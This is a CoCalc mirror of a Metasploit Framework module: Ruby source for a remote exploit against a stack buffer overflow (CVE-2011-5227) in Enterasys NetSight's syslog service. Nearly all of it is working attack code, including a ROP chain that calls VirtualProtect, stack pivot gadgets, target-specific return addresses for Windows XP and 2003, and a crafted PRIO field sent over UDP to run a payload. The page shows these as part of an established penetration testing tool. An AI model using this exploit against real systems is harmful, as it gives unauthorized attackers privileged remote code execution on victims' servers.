CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Enterasys NetSight nssyslogd.exe Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in Enterasys NetSight. The

16
        vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially

17
        crafted PRIO from a syslog message. The module has been tested successfully on

18
        Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.

19
      },

20
      'Author'         =>

21
        [

22
          'Jeremy Brown', # Vulnerability discovery

23
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery

24
          'juan vazquez' # Metasploit module

25
        ],

26
      'References'     =>

27
        [

28
          ['CVE', '2011-5227'],

29
          ['OSVDB', '77971'],

30
          ['BID', '51124'],

31
          ['ZDI', '11-350']

32
        ],

33
      'Payload'        =>

34
        {

35
          'BadChars' => "\x00",

36
          'Space' => 3000,

37
          'DisableNops' => true,

38
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

39
        },

40
      'Platform'       => 'win',

41
      'Targets'        =>

42
        [

43
          ['Enterasys NetSight 4.0.1.34 / Windows XP SP3',

44
            {

45
              'Offset' => 43,

46
              'Ret' => 0x77c4e444 # ADD ESP,30 # POP EDX # RETN # from msvcrt

47
            }

48
          ],

49
          ['Enterasys NetSight 4.0.1.34 / Windows 2003 SP2',

50
            {

51
              'Offset' => 43,

52
              'Ret' => 0x77bdf444 # ADD ESP,30 # POP EDX # RETN # from msvcrt

53
            }

54
          ]

55
        ],

56
      'Privileged'     => true,

57
      'DisclosureDate' => '2011-12-19',

58
      'DefaultTarget'  => 1

59
      ))

60


61
    register_options([ Opt::RPORT(514) ])

62
  end

63


64
  def junk(n=4)

65
    return rand_text_alpha(n).unpack("V")[0].to_i

66
  end

67


68
  def nop

69
    return make_nops(4).unpack("V")[0].to_i

70
  end

71


72
  def get_stackpivot

73
    stack_pivot = ''

74
    case target.name

75
    when /Windows XP SP3/

76
      stack_pivot << [0x77c4e448].pack("V") #ret

77
      stack_pivot << [0x77c4e448].pack("V") #ret

78
      stack_pivot << [0x77c4e448].pack("V") #ret

79
      stack_pivot << [0x77c4e448].pack("V") #ret

80
      stack_pivot << [0x77c4e444].pack("V") # ADD ESP,30 # POP EDX # RETN

81
    when /Windows 2003 SP2/

82
      stack_pivot << [0x77bdf448].pack("V") #ret

83
      stack_pivot << [0x77bdf448].pack("V") #ret

84
      stack_pivot << [0x77bdf448].pack("V") #ret

85
      stack_pivot << [0x77bdf448].pack("V") #ret

86
      stack_pivot << [0x77bdf444].pack("V") # ADD ESP,30 # POP EDX # RETN

87
    end

88
    return stack_pivot

89
  end

90


91
  def get_payload

92
    my_payload = ''

93


94
    case target.name

95
    when /Windows XP SP3/

96
      jmp_esp = [0x77c35459].pack("V")

97
      my_payload << jmp_esp

98
    when /Windows 2003 SP2/

99
      rop_gadgets =

100
        [

101
          0x77bb2563, # POP EAX # RETN

102
          0x77ba1114, # <- *&VirtualProtect()

103
          0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN

104
          junk,

105
          0x77bb0c86, # XCHG EAX,ESI # RETN

106
          0x77bc9801, # POP EBP # RETN

107
          0x77be2265, # ptr to 'push esp #  ret'

108
          0x77bb2563, # POP EAX # RETN

109
          #0x03C0990F,

110
          0x03c09f0f,

111
          0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0xb00 -> ebx)

112
          0x77bb48d3, # POP EBX, RET

113
          0x77bf21e0, # .data

114
          0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN

115
          0x77bbfc02, # POP ECX # RETN

116
          0x77bef001, # W pointer (lpOldProtect) (-> ecx)

117
          0x77bd8c04, # POP EDI # RETN

118
          0x77bd8c05, # ROP NOP (-> edi)

119
          0x77bb2563, # POP EAX # RETN

120
          0x03c0984f,

121
          0x77bdd441, # SUB EAX, 03c0940f

122
          0x77bb8285, # XCHG EAX,EDX # RETN

123
          0x77bb2563, # POP EAX # RETN

124
          nop,

125
          0x77be6591, # PUSHAD # ADD AL,0EF # RETN

126
        ].pack("V*")

127
      my_payload << rop_gadgets

128
    end

129


130
    my_payload << payload.encoded

131
    return my_payload

132
  end

133


134
  def exploit

135
    connect_udp

136


137
    prio = "<"

138
    prio << rand_text_alpha(19)

139
    prio << get_stackpivot

140
    prio << rand_text_alpha(4)

141
    prio << [target.ret].pack("V")

142
    prio << ">"

143


144
    message = prio

145
    message << rand_text_alpha(9 + (15 - Rex::Socket.source_address(datastore['RHOST']).length)) # Allow to handle the variable offset due to the source ip length

146
    message << get_payload

147


148
    print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")

149
    udp_sock.put(message)

150


151
    disconnect_udp

152
  end

153
end

154


155